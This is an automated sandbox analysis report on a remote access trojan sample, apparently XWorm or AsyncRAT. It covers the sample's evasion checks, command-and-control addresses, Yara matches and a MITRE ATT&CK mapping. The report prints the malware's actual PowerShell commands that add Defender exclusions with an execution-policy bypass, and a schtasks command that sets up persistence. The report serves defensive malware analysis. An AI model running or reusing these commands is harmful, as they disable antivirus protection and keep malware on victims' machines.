                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Word.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                    Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: file.exe, Word.exe.0.dr Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\file.exe Memory allocated: 730000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\file.exe Memory allocated: 1A680000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Word.exe Memory allocated: 1450000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Word.exe Memory allocated: 1B1A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Word.exe Memory allocated: 600000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Word.exe Memory allocated: 1A4E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Word.exe Memory allocated: 2A00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Word.exe Memory allocated: 1AB30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Word.exe Memory allocated: 1750000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Word.exe Memory allocated: 1B080000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Word.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 7985
                    Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1832
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5966
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3820
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7643
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1947
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8107
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1470
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8017
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1579
                    Source: C:\Users\user\Desktop\file.exe TID: 8168 Thread sleep time: -16602069666338586s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192 Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464 Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712 Thread sleep count: 8107 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716 Thread sleep count: 1470 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740 Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956 Thread sleep count: 8017 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960 Thread sleep count: 1579 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984 Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Word.exe TID: 1648 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Word.exe TID: 2056 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Word.exe TID: 1568 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Word.exe TID: 2176 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Roaming\Word.exe File Volume queried: C:\ FullSizeInformation
                    Source: Word.exe.0.dr Binary or memory string: vmware
                    Source: file.exe, 00000000.00000002.2560460536.000000001B240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
                    Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FFAAC487A71 CheckRemoteDebuggerPresent, 0_2_00007FFAAC487A71
                    Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\Word.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Word.exe'
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Word.exe'
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Word" /tr "C:\Users\user\AppData\Roaming\Word.exe"
                    Source: file.exe, 00000000.00000002.2523388920.00000000026F6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: file.exe, 00000000.00000002.2523388920.00000000026F6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
                    Source: file.exe, 00000000.00000002.2523388920.00000000026F6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: file.exe, 00000000.00000002.2523388920.00000000026F6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                    Source: file.exe, 00000000.00000002.2523388920.00000000026F6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager2
                    Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
                    Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Word.exe | Queries volume information: C:\Users\user\AppData\Roaming\Word.exe VolumeInformation
                    Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    Source: Yara match | File source: file.exe, type: SAMPLE
                    Source: Yara match | File source: 0.0.file.exe.260000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2555959588.0000000012691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000000.1250043956.0000000000262000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2523388920.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: file.exe PID: 5668, type: MEMORYSTR
                    Source: Yara match | File source: C:\Users\user\AppData\Roaming\Word.exe, type: DROPPED

                    Remote Access Functionality

                    Source: Yara match | File source: file.exe, type: SAMPLE
                    Source: Yara match | File source: 0.0.file.exe.260000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2555959588.0000000012691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000000.1250043956.0000000000262000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2523388920.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: file.exe PID: 5668, type: MEMORYSTR
                    Source: Yara match | File source: C:\Users\user\AppData\Roaming\Word.exe, type: DROPPED

                    MITRE ATT&CK Matrix

                    Each line below is one column (tactic) of the report's matrix, read top to bottom; the number in brackets after a technique is the badge count the report attaches to techniques matched by this analysis.

                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                    Execution: Windows Management Instrumentation [12]; Scheduled Task/Job [1]; PowerShell [1]; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                    Persistence: DLL Side-Loading [1]; Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [21]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                    Privilege Escalation: DLL Side-Loading [1]; Process Injection [12]; Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [21]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                    Defense Evasion: Disable or Modify Tools [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [2]; DLL Side-Loading [1]; Masquerading [1]; Modify Registry [1]; Virtualization/Sandbox Evasion [151]; Process Injection [12]
                    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                    Discovery: File and Directory Discovery [1]; System Information Discovery [23]; Security Software Discovery [531]; Process Discovery [2]; Virtualization/Sandbox Evasion [151]; Application Window Discovery [1]; System Network Configuration Discovery [1]; System Owner/User Discovery; Network Sniffing
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                    Collection: Archive Collected Data [11]; Screen Capture [1]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                    Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [1]; Non-Standard Port [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [12]; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                    Behavior Graph (text rendering of the report's graph). ID: 1565292; Sample: file.exe; Startdate: 29/11/2024; Architecture: WINDOWS; Score: 100
                    Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures
                    Top-level processes started: file.exe; Word.exe (two instances); 2 other processes
                    file.exe network: 103.230.121.124 (ports 49806, 49829, 7000; VPSQUANUS, Hong Kong); ip-api.com 208.95.112.1 (ports 49699, 80; TUT-ASUS, United States)
                    file.exe dropped: C:\Users\user\AppData\Roaming\Word.exe, PE32
                    file.exe signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Protects its processes via BreakOnTermination flag; Bypasses PowerShell execution policy; 3 other signatures
                    file.exe started: powershell.exe (three instances); 2 other processes
                    Word.exe signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                    powershell.exe signatures: Loading BitLocker PowerShell Module
                    Each powershell.exe instance and each of the 2 other child processes started conhost.exe

Submitted sample
Source | Detection | Scanner | Label
file.exe | 76% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
